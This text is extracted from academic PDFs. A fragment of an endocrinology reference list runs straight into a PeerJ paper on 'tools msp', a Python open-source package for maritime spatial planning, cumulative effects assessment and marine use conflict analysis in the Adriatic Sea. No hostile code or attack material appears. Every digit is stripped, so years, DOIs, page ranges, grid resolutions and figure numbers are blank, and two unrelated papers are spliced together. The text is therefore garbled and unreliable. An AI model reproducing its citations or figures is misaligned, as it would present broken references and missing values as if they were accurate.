ma, andersen dk, thomas b, torriani m & elahi d. impact of acute biochemical castration on insulin sensitivity in healthy adult men. endocrine research – . (https://doi. org/ . / ) singh ab, hsia s, alaupovic p, sinha-hikim i, woodhouse l, buchanan ta, shen r, bross r, berman n & bhasin s. the effects of varying doses of t on insulin sensitivity, plasma lipids, apolipoproteins, and c-reactive protein in healthy young men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) gibb fw, homer nz, faqehi am, upreti r, livingstone de, mcinnes kj, andrew r & walker br. aromatase inhibition reduces insulin sensitivity in healthy men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) shanbhogue vv, hansen s, jorgensen nr, brixen k & gravholt ch. bone geometry, volumetric density, microarchitecture and estimated bone strength assessed by hr-pqct in klinefelter syndrome. journal of bone and mineral research – . (https://doi. org/ . /jbmr. ) aksglaede l, skakkebaek ne & juul a. abnormal sex chromosome constitution and longitudinal growth: serum levels of insulin-like growth factor (igf)-i, igf binding protein- , luteinizing hormone, and testosterone in males with ,xxy, ,xyy, or sex- determining region of the y chromosome (sry)-positive ,xx karyotypes. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) birzniece v & ho kky. sex steroids and the gh axis: implications for the management of hypopituitarism. best practice and research: clinical endocrinology and metabolism – . (https://doi. org/ . /j.beem. . . ) emmelot-vonk mh, verhaar hj, nakhai pour hr, aleman a, lock tm, bosch jl, grobbee de & van der schouw yt. effect of testosterone supplementation on functional mobility, cognition, and other parameters in older men: a randomized controlled trial. jama – . (https://doi.org/ . / jama. . ) received in final form july accepted august accepted preprint published online august this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /eje- - https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /jc. - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /jcem. . . https://doi.org/ . /jc. - https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /jc. - https://doi.org/ . /j.beem. . . https://doi.org/ . /j.beem. . . https://doi.org/ . /jama. . https://doi.org/ . /jama. . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract materials and methods subjects study design hyperinsulinemic euglycemic clamp analytical techniques body composition, maximal aerobic capacity and -h ambulatory blood pressure measurement microdialysis microdialysis statistics results characteristics of study subjects and body composition during treatment insulin sensitivity and circulating metabolites sex hormones, gonadotrophins, hemoglobin and hematocrit resting ee, physical fitness and muscle strength microdialysis microdialysis interstitial concentrations of glucose interstitial concentrations of glycerol interstitial concentrations of lactate -h ambulatory blood pressure discussion declaration of interest funding author contribution statement acknowledgements references submitted march accepted september published october corresponding author stefano menegon, stefano.menegon@ismar.cnr.it, ste.menegon@gmail.com academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright menegon et al. distributed under creative commons cc-by . open access tools msp: an open source software package to support maritime spatial planning stefano menegon, alessandro sarretta, daniel depellegrin, giulio farella, chiara venier and andrea barbanti institute of marine sciences, national research council, venice, italy abstract this paper presents the tools msp software package, a python-based free and open source software (foss) for geospatial analysis in support of maritime spatial planning (msp) and marine environmental management. the suite was initially developed within the adriplan data portal, that has been recently upgraded into the tools msp geoplatform (data.tools msp.eu), an integrated web platform that supports msp through the application of different tools, e.g., collaborative geospatial modelling of cumulative effects assessment (cea) and marine use conflict (muc) analysis. the package can be used as stand-alone library or as collaborative webtool, providing user- friendly interfaces appropriate to decision-makers, regional authorities, academics and msp stakeholders. an effective msp-oriented integrated system of web-based software, users and services is proposed. it includes four components: the tools msp geoplatform for interoperable and collaborative sharing of geospatial datasets and for msp-oriented analysis, the tools msp package as stand-alone library for advanced geospatial and statistical analysis, the desktop applications to simplify data curation and the third party data repositories for multidisciplinary and multilevel geospatial datasets integration. the paper presents an application example of the tools msp geonode plugin and an example of tools msp stand-alone library for cea in the adriatic sea. the tools msp and the developed software have been released as foss under the gpl license and are currently under further development. subjects data science, scientific computing and simulation, spatial and geographic information systems keywords python, sdi, tools msp software, open source, cumulative effects assessment, maritime spatial planning, geonode introduction management and planning of the marine environment require a coordinated development of socio-economic activities, while ensuring a sustainable use of marine resources using an ecosystem-based approach (european union, ; center for ocean solutions, ; douvere, ). in the last decade, practical tools to support the implementation of the various steps of maritime spatial planning (msp) have been developed in various contexts and also analysed to evaluate their usability for different planning purposes (stelzenmüller et al., ; pınarbaşı et al., ). how to cite this article menegon et al. ( ), tools msp: an open source software package to support maritime spatial planning. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:stefano.menegon@ismar.cnr.it mailto:ste.menegon@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. an extended analysis performed by the ‘‘ebm tools network’’ (https://ebmtoolsdatabase. org/) in support of ecosystem based management has recollected and classified various tools, with respect to types, costs, skills, data and technological requirements. two categories of tools have emerged in the recent years as analytical support to decision-makers: the sea use conflict analysis and the cumulative impacts assessment. sea use conflict analysis has been extensively applied in different geographical contexts (hadjimitsis et al., ; white, halpern & kappel, ) to investigate and spatially identify conflicts between coastal and marine activities for current conditions and for the comparison of possible future scenarios. in particular, the coexist project developed the grid tool (georeferenced interactions database; gramolini et al., ) to analyse the level of coexistence among uses, depicting areas where different sectors more likely overlap in space and time. in parallel, various authors proposed methodologies to create cumulative impact maps to reconnect effects of human uses of the sea on environmental components, starting from the methodology firstly introduced by halpern et al. ( ) at global scale, then implemented in several marine regions, such as baltic sea (korpinen, meidinger & laamanen, ), north sea (andersen et al., ), adriatic sea (depellegrin et al., ) and at regional scale (barbanti et al., a; barbanti et al., b). in particular, stock ( ) developed an open source software for mapping human impacts on marine ecosystems. the msp process involves several user categories, from data producers (e.g., domain experts like ecologists and modellers) to stakeholders and planners. it requires a solid command of geographical information to create a more comprehensive understanding of coastal and marine areas and to support management and planning policies. the development and implementation of spatial data infrastructures (sdi) at multiple levels (i.e., local, regional, national and global) matches the need to make geographical data more accessible and interoperable (georis-creuseveau, claramunt & gourmelon, ). however, various authors (maguire & longley, ) have highlighted the importance of the integration of geoportals in the context of sdis and the role of a user-driven and community-based development as fundamental aspects for an effective and efficient use of the resources (de longueville, ; georis-creuseveau, claramunt & gourmelon, ). this research presents components and functionalities of the tools msp software package, a python-based free and open source software (foss) which implements a marine use conflict (muc) analysis module based on the coexist methodology (gramolini et al., ) and a cumulative effects assessment (cea) module based on the methodology developed in menegon et al. ( a). its implementation in the context of a collaborative geoplatform supporting msp and environmental management and its utilization as stand-alone library for cumulative effects assessment (cea) is tested for the adriatic sea. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://ebmtoolsdatabase.org/ https://ebmtoolsdatabase.org/ http://dx.doi.org/ . /peerj-cs. background muc and cea analysis the maritime use conflict (muc) tool implements the coexist methodology to estimate the spatial distribution of the conflicts between sea uses. the inputs of the tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers of presence/absence for each human use present in the area (e.g., location of aquacultures, location of oil and gas platforms); (iv) an expert based characterization for each human use through four attributes (vertical scale, spatial domain, temporal domain and mobility). according to the attributes of each use three pre-defined rules, included in the coexist methodology are dynamically applied to estimate the potential conflict score for each pair of uses. the potential score varies from (no conflict) to (very high conflict). afterwards, the area of analysis is subdivided into regular grid cells according to the specified resolution and, on each cell, information about spatial overlapping human uses are extracted. finally, on each cell the total muc score is calculated summarizing the potential conflict score for each pair of overlapping uses. the main output is a geospatial distribution of muc score over the entire area of analysis. for a detailed explanation of the rules and algorithm we refer to gramolini et al. ( ) and barbanti et al. ( ). the cumulative effects assessment (cea) tool implements the methodology described in menegon et al. ( a). formally, we consider ‘‘cea as a systematic procedure for identifying and evaluating the significance of effects from multiple pressures and/or activities on single or multiple receptors. cea provides management options, by quantifying the overall expected effect caused by multiple pressures and by identifying critical pressures or pressure combinations and vulnerable receptors. the analysis of the causes (source of pressures), pathways, interactions and consequences of these effects on receptors is an essential and integral part of the process’’ (judd, backhaus & goodsir, ). the inputs of the tools msp cea tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers representing intensity or presence/absence of human uses (e.g., intensity of fishery and maritime transport, presence of aquacultures and oil & gas platforms); (iv) layers representing intensity or presence/absence of environmental components (e.g., seabed habitats, probability of presence of nursery habitats, probability of presence of marine mammals); (v) use-specific relative pressure weights and distances of pressure propagation; (vi) environmental component sensitivities related to specific pressures or more general ecological models that describe the response of the environmental components to a specific pressure. similarly to the muc tool, the area of analysis is subdivided into regular grid cells. then, on each cell, information about the presence of human uses and environmental components are extracted. afterwards, the geospatial layers on human uses are propagated and combined to estimate the geospatial distribution of different pressures (e.g., marine litter, underwater noise, abrasion) for the entire analysis area. finally, the geospatial distribution of single and cumulative effects and impacts are estimated combining together the pressure layers and the environmental components layers through a sensitivity score. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interaction diagram between the tools msp geoplatform, external applications and poten- tial end-users. component .b and (blue background) are developed and released with the tool msp package. full-size doi: . /peerjcs. /fig- the msp-oriented integrated system in fig. the interactions between the tools msp geoplatform, external application and potential end-users are presented. as a whole, they represent an integrated system of software, users and web services capable to effectively support msp activities. overall, the system can be described by four components: component : tools msp geoplatform the geoplatform is a community-based integrated web application. data are managed in a sdi over the entire workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. internally, the tools msp geoplatform is divided into two sub-components: the geospatial content management system (cms; .a) and the tools msp package ( .b). a more detailed description of the geoplatform is given in the next section. component : tools msp package as stand-alone library the package can also be downloaded and used as stand-alone library independently from the geonode software. the library can be efficiently used through jupyter notebook (kluyver et al., ; https://jupyter.org/), a web-based computational environment, which provides one of the most convenient user interfaces for interactive analysis (mcgibbon et al., ; shen, ). the software allows the authoring of shareable and reproducible menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://jupyter.org/ http://dx.doi.org/ . /peerj-cs. notebook documents which allow a combination of input code, rich media representations of the output results, explanatory text, mathematics, images forming a rich computational narrative (kluyver et al., ). regarding the tools msp development, the jupyter notebook supports rapid prototyping of new features, libraries testing and advanced analysis of case studies (fig. , components ). component : desktop applications spatial layers and maps managed in the geoplatform can be downloaded in different formats directly from the web interface or can be reused in desktop gis applications for further investigation by connecting to standard web services. data curation can be also improved using the desktop gis qgis (qgis development team, ) together with the geoserver explorer plugin (boundless, ). this plugin eases the publication, upload and visual encoding of data and layers, allowing collaborators and domain experts to better contribute to the update and maintenance of the geoplatform content. component : third party data repositories msp-related workflows need relevant and updated data to be analysed and processed, the interaction between this component and the tools msp geoplatform highlights the ability of the system to integrate data from other data portals and sdis, such as shape adriatic atlas (http://atlas.shape-ipaproject.eu/), emodnet portals (http: //www.emodnet.eu/), eea services (https://www.eea.europa.eu/data-and-maps), coconet web gis (http://coconetgis.ismar.cnr.it/) or the european atlas of the seas (https: //ec.europa.eu/maritimeaffairs/atlas/maritime_atlas). all these portals use interoperable ogc-compliant web services to exchange spatial information; based on geonode features, the tools msp geoplatform allows users to display external layers (e.g., served from remote web map services; ogc, ) and enriches its catalogue with relevant data through the harvesting of standard web services (geonode remote services). the creation and maintenance of this network of collaborations allow to harmonize existing multiple efforts and improve the availability of spatial datasets for users interested in msp-related information. the tools msp geoplatform in fig. the detailed implementation architecture of the tools msp geoplatform is presented. the geospatial cms is the core of the system and is based on the geonode (geonode, developers and contributors team, ) software, a django-based web platform for developing community-based sdi. geonode facilitates the upload and management of geospatial datasets, making them discoverable and available via standard open geospatial consortium (ogc) protocols and web mapping applications. geonode also allows users to automatically upload, describe and share the outputs produced by the tools msp package. the tools msp package is python-based open source software available on github (menegon, a). the tools msp core library implements the algorithms for cea and muc geospatial modelling and the base functionalities to read the input geospatial datasets and configurations, to apply data transformation operations (such as normalization, menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://atlas.shape-ipaproject.eu/ http://www.emodnet.eu/ http://www.emodnet.eu/ https://www.eea.europa.eu/data-and-maps http://coconetgis.ismar.cnr.it/ https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas http://dx.doi.org/ . /peerj-cs. figure implementation architecture of the tools msp collaborative geoplatform. full-size doi: . /peerjcs. /fig- aggregation, reclassification, gaussian convolution, geospatial filtering) and to manage and write model output results. tools msp adopts a grid-based approach for efficient numerical computation of the geospatial models. the grid-based functionalities are provided through the general purpose rectifiedgrid library (menegon, b), that ensures direct integration of a multitude of different datasets and facilitates data preparation procedures. it simplifies the access and rasterization of multi-format geospatial data (environmental and anthropogenic datasets) and performs arithmetic and transformation operations on raster map layers. rectifiedgrid combines several foss python projects: ( ) numpy and scipy for efficient numerical computation (van der walt, colbert & varoquaux, ) and ( ) rasterio and fiona (mapbox, rasterio development team, ; fiona, developers and contributors team, ) for multi-format raster and vector data access through the geospatial data abstraction library (gdal; warmerdam, ). interactive graphics for visualization of output results are based on the bokeh visualization library (bokeh development team, ). different users can have different modes of interaction with the geoplatform: administrators perform the case study setup, by specifying the connectors to the geospatial repositories and defining the pre-processing chain for environmental and human use layers harmonization and utilization in the case study (fig. , case study setup gui). a broad user community composed by decision-makers, planners, academics, research institutions, msp stakeholders and the general public can use the case study configuration to run the build-in version of the tools msp library implemented in the geoplatform (fig. , webtool gui). more in detail, the tools msp webtool gui implements a four step menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. workflow: (step ) webtool selection (muc or cea); (step ) case study selection, choosing from a pre-set of case studies; (step ) case study configuration, optionally outlining a custom subregion of analysis or a custom combination of human uses, pressures, and environmental components; (step ) generation of geospatial and statistical outputs. the outputs are published in geonode and accessible through standard interoperable services. the produced reports, graphics and statistical outputs are archived in a dedicated data store catalogue and can be further visualized and re-used also by non technical stakeholders. in the results section an application of the tools msp geonode plugin for case study setup and cea analysis in the adriatic sea is provided. results at the current stage, the tools msp modelling framework has been applied in various areas of interest in the adriatic sea, such as entire adriatic sea (depellegrin et al., ), italian adriatic sea (menegon et al., a) and regional scale analysis for the northern adriatic sea (menegon et al., b) and emilia-romagna region (barbanti et al., a; barbanti et al., b). in the following section results for tools msp geonode plugin and stand-alone library for the adriatic sea will be presented. application of tools msp geonode plugin the tools msp geonode plugin implements two sets of interfaces: the case study setup gui and the webtool gui. in fig. an example of gui illustrating a case study setup is presented. the interface is intended for administrators and was designed to facilitate the configuration of case study input parameters. the gui is organized in sections: (i) basic parameters (fig. a); (ii) human uses (fig. b); (iii) environmental components (fig. c); (iv) pressures (fig. d). in the example the case study named ‘‘adriatic sea ’’ has a grid resolution of m and the area of analysis is the adriatic sea (fig. e). figure f shows the expanded view of geospatial dataset set up for ‘‘maritime transport’’. specific data transformation operations have been configured through the ‘‘pre-processing expression’’ field. the expression is written with a python-based syntax that allows the user to select and combine one or more layers, apply filters, apply masking conditions, perform grid-cell-based arithmetic and other data transformations (e.g., normalization, logarithmic scaling, gaussian convolution). the resulting geospatial dataset is shown as thumbnail directly into the case study setup gui (fig. f). the example reported in fig. f refers to a human use (maritime transport) but is equally valid to environmental components or pressures. the webtool gui is the standard interface allowing non-technical users (e.g., decision- makers, msp stakeholders, planners) to perform cea and muc analyses starting from the pre-set case studies. the webtool gui implements a four-steps workflow: (step ) webtool selection; (step ) case study area selection; (step ) study area selection & dataset configuration; (step ) geospatial and statistical outputs. an example of the outputs (step : results) for the case study ‘‘adriatic sea ’’ is shown in fig. . through the gui, the geospatial menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of case study setup graphical user interface. full-size doi: . /peerjcs. /fig- distribution of cea for the analysis area as well as the statistical outputs can be explored and downloaded. a complete example of muc and cea analysis through the tools msp webtool gui including a more in-depth investigation on its strengths and limitations in support of maritime spatial planning is available in menegon et al. ( b). application of tools msp package as stand-alone library in this section we present a cumulative effects assessment based on the stand-alone tools msp package applied for the adriatic sea. the case study set up has been downloaded from the tools msp geoplatform. it consists of a directory named ‘‘adriatic_sea’’ containing the input geospatial layers related to human uses, environmental components and pressures and environmental component sensitivities. an example of the case study set up is released within the tools msp software package (https://github.com/cnr- ismar/tools msp/tree/master/data/demo_case_study) and is available for test and demo purposes. the case study is presented using a workflow implemented through the jupyter computational environment including the following steps (fig. ): • in [ ] import libraries: tools msp casestudy class, rectifiedgrid using the rg alias, matplotlib and numpy. casestudy is a comprehensive class that provides the methods to setup a case study (e.g., specify datasets and input parameters) or alternatively to load a predefined case study, perform the analysis and manage the results. • in [ ] load predefined case study for adriatic sea ( km × km resolution). after instantiating the casestudy class specifying the ‘‘adriatic_sea’’ case study, the methods load_layers and load_inputs are called in order to import the environmental, pressure and menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/cnr-ismar/tools msp/tree/master/data/demo_case_study https://github.com/cnr-ismar/tools msp/tree/master/data/demo_case_study http://dx.doi.org/ . /peerj-cs. figure example of graphical user interface presenting geospatial and statistical results. full-size doi: . /peerjcs. /fig- human use layers (including the layer metadata) and the input parameters respectively (e.g., sensitivity scores). • in [ ] print example case study setup providing general information on spatial extent (in number of cells) and number of available layers (geospatial datasets). the input geospatial layers and the area of analysis layer (.grid parameter) are instances of the rectifiedgrid class. rectifiedgrid is the main class provided by the rectifiedgrid library and it is designed to represent and manipulate d georeferenced data arrays. rectifiedgrid provides the ‘‘.plotmap’’ method to plot the layer and other information (e.g., coastline, rivers) on a map. • in [ ] cea analysis function. the casestudy class exposes the ‘‘.cumulative_impact’’ method to perform a cumulative effects assessment (menegon et al., a). • in [ ] cea geospatial results and graphical outputs for the adriatic sea. the map of the cea result is visualized using the ‘‘.plotmap’’ method in combination with the distribution of cea values of the grid cells. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure workflow for tools msp stand-alone library application using jupyter computational envi- ronment. full-size doi: . /peerjcs. /fig- menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table software characteristics, requirements and availability for rectifiedgrid library and tools msp package. rectifiedgrid tools msp language python python operating system platform-independent; requires python distribution platform-independent; requires python distribution dependencies numpy, geopandas, scipy, rasterio, fiona, shapely, rtree, affine, matplotlib, gdal rectifiedgrid, bokeh, geonode (for plugin usage) software location doi: . /zenodo. doi: . /zenodo. code repository https://github.com/cnr-ismar/rectifiedgrid https://github.com/cnr-ismar/tools msp license gpl gpl software details in table the summary of the main characteristics and requirements of rectifiedgrid and tools msp is presented. discussion and conclusions this paper presents architecture, implementation and practical application of an msp- oriented software package named tools msp. the tool is presented as geonode plugin and as a stand-alone library determining different levels of usability by different user groups. as a plugin, tools msp supports a wide user community that facilitates the implementation of collaborative analyses improving the reusability and sharing of the result outputs. the integration within a geospatial cms allows to manage the entire processing data workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. the usage of the plugin is particularly suitable as it provides a user-friendly interface appropriate to decision-makers, regional authorities, academics and msp stakeholders (e.g., fishers, engos, industry). the plugin eases data transformation operations reducing the need of manual data preparation and standardization procedures. furthermore, archiving the pre-processing expressions in combination with the case study makes the transformation of the input data more explicit and the entire process more transparent and replicable. as stand-alone library, tools msp requires advanced programming skills for its usage, but provides more flexible integration with other libraries and python packages also outside tools msp modelling framework. it is particularly suitable for planning authorities seeking advanced modelling procedure for msp/iczm and management purposes. the scientific community, consultancies and programmers can use and further develop the library for different research objectives and integration into decision-support-systems. compared to other existing decision support tools in msp, the tools msp ‘‘approach’’ is more flexible as it ( ) incorporates a multi-objective toolset (cea and muc) which can be extended for other analysis purposes (e.g., scenario analysis, comparative msp or ecosystem services assessment); ( ) it enables management and treatment of different datasets and menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. https://github.com/cnr-ismar/rectifiedgrid https://github.com/cnr-ismar/tools msp http://dx.doi.org/ . /peerj-cs. formats and ( ) it provides different levels of usability ranging from experienced modellers to more user-friendly modelling through guis. the tools cea and muc models implemented can support the development of maritime spatial plans within the implementation process of the msp directive ( / /ce) in various case study areas and marine waters in the mediterranean sea and beyond. the package is regularly upgraded within the tools msp geoplatform (data.tools msp.eu) including ongoing implementations of pressure specific analysis of cea, cea backsourcing (cea-b; menegon et al., a) and the integration of marine ecosystem services oriented analysis of anthropogenic threats (mes-threat) in support of environmental management and resource restoration (depellegrin & blažauskas, ; menegon et al., b). the tools msp software package was used in adriplan (adriatic and ionian maritime spatial planning) and ritmare (ricerca italiana per il mare) projects and is currently implemented by various research communities within ongoing european projects around the mediterranean, such as supreme (supporting maritime spatial planning in the eastern mediterranean) or portodimare (geoportal of tools & data for sustainable management of coastal and marine environment). acknowledgements we would like to thank the editor and the three reviewers for valuable comments contributing to the overall improvement of the manuscript. additional information and declarations funding this work was supported by the flagship project ritmare—italian research for the sea, coordinated by the italian national research council and funded by the italian ministry of education, university and research within the national research program – . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: flagship project ritmare—italian research for the sea. italian ministry of education, university. national research program – . competing interests the authors declare there are no competing interests. author contributions • stefano menegon analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • alessandro sarretta and daniel depellegrin contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • giulio farella and chiara venier contributed reagents/materials/analysis tools. • andrea barbanti contributed reagents/materials/analysis tools, founding acquisition, supervision. data availability the following information was supplied regarding data availability: stefano menegon. ( , february ). tools msp: geospatial tools to support maritime spatial planning (version . . -beta. ). zenodo. doi . /zenodo. . stefano menegon. ( , february ). rectifiedgrid: geospatial python library for grid-based analyses (version . . -beta. ). zenodo. doi . /zenodo. . references andersen jh, stock a, heinänen s, mannerla m, vinther m. . human uses, pressures and impacts in the eastern north sea. technical report from dce— danish centre for environment and energy no. . aarhus: aarhus university. available at http://www.dmu.dk/pub/tr .pdf . barbanti a, campostrini p, musco f, sarretta a, gissi e. . developing a mar- itime spatial plan for the adriatic ionian region. zenodo. venice: cnr-ismar. doi . /zenodo. . barbanti a, sarretta a, venier c, bellaciccio s, depellegrin d, farella g, mene- gon s, lorito s, grati f, bolognini l, perini l. a. sviluppo ed analisi di proposte di iczm-msp in aree specifiche: costa emiliano-romagnola. volume : quadro conoscitivo di riferimento e sua analisi ai fini della pianificazione dello spazio marittimo icm-msp nella regione adriatico ionica. zenodo. doi . /zenodo. . barbanti a, sarretta a, venier c, bellacicco s, farella g, menegon s, depellegrin d, lorito s, grati f, bolognini l, perini l, pastres r, porporato e. b. sviluppo ed analisi di proposte di iczm-msp in aree specifiche: costa emiliano-romagnola. volume : individuazione ed analisi dei possibili obiettivi gestionali e delle misure per attuarli. zenodo. doi . /zenodo. . bokeh development team. . bokeh: python library for interactive visualization. available at http://www.bokeh.pydata.org/ (accessed on february ). boundless. . geoserver explorer plugin for qgis. available at http://boundlessgeo. github.io/qgis-plugins-documentation/geoserver/ (accessed on february ). center for ocean solutions. . decision guide for selecting decision support tools for marine spatial planning. technical report. stanford: the woods institute for the environment, stanford university. de longueville b. . community-based geoportals: the next generation? concepts and methods for the geospatial web . . computers, environment and urban systems ( ): – doi . /j.compenvurbsys. . . . menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://www.dmu.dk/pub/tr .pdf http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://www.bokeh.pydata.org/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://dx.doi.org/ . /j.compenvurbsys. . . http://dx.doi.org/ . /peerj-cs. depellegrin d, blažauskas n. . integrating ecosystem service values into oil spill im- pact assessment. journal of coastal research ( ): – doi . /jcoastres-d- - . . depellegrin d, menegon s, farella g, ghezzo m, gissi e, sarretta a, venier c, barbanti a. . multi-objective spatial tools to inform maritime spatial planning in the adriatic sea. science of the total environment : – doi . /j.scitotenv. . . . douvere f. . the importance of marine spatial planning in advancing ecosystem- based sea use management. marine policy ( ): – doi . /j.marpol. . . . european union. . directive / /eu of the the european parliament and of the council of july establishing a framework for maritime spatial planning. o.j. l / . available at https://eur-lex.europa.eu/legal-content/en/txt/?uri= celex% a l . fiona, developers and contributors team. . fiona is ogr’s neat, nimble, no- nonsense api for python programmers. available at http://toblerity.org/fiona/ (accessed on february ). geonode, developers and contributors team. . geonode: open source geospatial content management system. available at http://geonode.org/ (accessed on february ). georis-creuseveau j, claramunt c, gourmelon f. . a modelling framework for the study of spatial data infrastructures applied to coastal management and planning. international journal of geographical information science : – doi . / . . . gramolini r, grati f, fabi g, schule t. . grid georeference interactions database. deliverable d coexist project. interaction in coastal waters: a roadmap to sustainable integration of aquaculture and fisheries. available at http://www. coexistproject.eu/images/coexist/tools/grid.pdf . hadjimitsis dg, agapiou a, themistocleous k, mettas c, evagorou e, papoutsa c, nisantzi a, mammouri r, tzouvaras m, lysssandrou v. . resolving sea and land conflicts in cyprus using marine spatial planning. in: proceedings of the th international conference on environmental science and technology cest . athens, greece. halpern bs, mcleod kl, rosenberg aa, crowder lb. . managing for cumulative impacts in ecosystem-based management through ocean zoning. ocean & coastal management ( ): – doi . /j.ocecoaman. . . . judd ad, backhaus t, goodsir f. . an effective set of principles for practical implementation of marine cumulative effects assessment. environmental science & policy : – doi . /j.envsci. . . . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kel- ley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jcoastres-d- - . http://dx.doi.org/ . /j.scitotenv. . . http://dx.doi.org/ . /j.marpol. . . https://eur-lex.europa.eu/legal-content/en/txt/?uri=celex% a l https://eur-lex.europa.eu/legal-content/en/txt/?uri=celex% a l http://toblerity.org/fiona/ http://geonode.org/ http://dx.doi.org/ . / . . http://www.coexistproject.eu/images/coexist/tools/grid.pdf http://www.coexistproject.eu/images/coexist/tools/grid.pdf http://dx.doi.org/ . /j.ocecoaman. . . http://dx.doi.org/ . /j.envsci. . . http://dx.doi.org/ . /peerj-cs. . jupyter notebooks—a publishing format for reproducible computa- tional workflows. in: loizides f, schmidt b, eds. positioning and power in aca- demic publishing: players, agents and agendas. amsterdam: ios press, – doi . / - - - - - . korpinen s, meidinger m, laamanen m. . cumulative impacts on seabed habitats: an indicator for assessments of good environmental status. marine pollution bulletin ( ): – doi . /j.marpolbul. . . . maguire dj, longley pa. . the emergence of geoportals and their role in spatial data infrastructures. computers, environment and urban systems ( ): – doi . /s - ( ) - . mapbox, rasterio development team. . rasterio: access to geospatial raster data. available at https://mapbox.github.io/rasterio/ (accessed on february ). mcgibbon rt, beauchamp ka, harrigan mp, klein c, swails jm, hernández cx, schwantes cr, wang l-p, lane tj, pande vs. . mdtraj: a modern open library for the analysis of molecular dynamics trajectories. biophysical journal : – doi . /j.bpj. . . . menegon s. a. tools msp geospatial tools to support maritime spatial planning. zenodo. version . . -beta. . doi . /zenodo. . menegon s. b. rectifiedgrid geospatial python library for geospatial grid-based analyses. zenodo. version . . -beta. . doi . /zenodo. . menegon s, depellegrin d, farella g, gissi e, ghezzo m, sarretta a, venier c, barbanti a. a. a modelling framework for msp-oriented cumulative effects assessment. ecological indicators : – doi . /j.ecolind. . . . menegon s, depellegrin d, farella, sarretta a, venier c, barbanti a. b. addressing cumulative effects, maritime conflicts and ecosystem services threats through msp-oriented geospatial webtools. ocean & coastal management : – doi . /j.ocecoaman. . . . ogc—open geospatial consortium inc. . opengis web map server implemen- tation specification. pınarbaşı k, galparsoro i, borja Á, stelzenmüller v, ehler cn, gimpel a. . decision support tools in marine spatial planning: present applications, gaps and future perspectives. marine policy : – doi . /j.marpol. . . . qgis development team. . qgis geographic information system. open source geospatial foundation project. available at https://www.qgis.org/ (accessed on february ). shen h. . interactive notebooks: sharing the code. nature : – doi . / a. stelzenmüller v, lee j, south a, foden j, rogers si. . practical tools to support ma- rine spatial planning: a review and some prototype tools. marine policy : – doi . /j.marpol. . . . stock a. . open source software for mapping human impacts on marine ecosystems with an additive model. journal of open research software ( ):e doi . /jors. . menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . 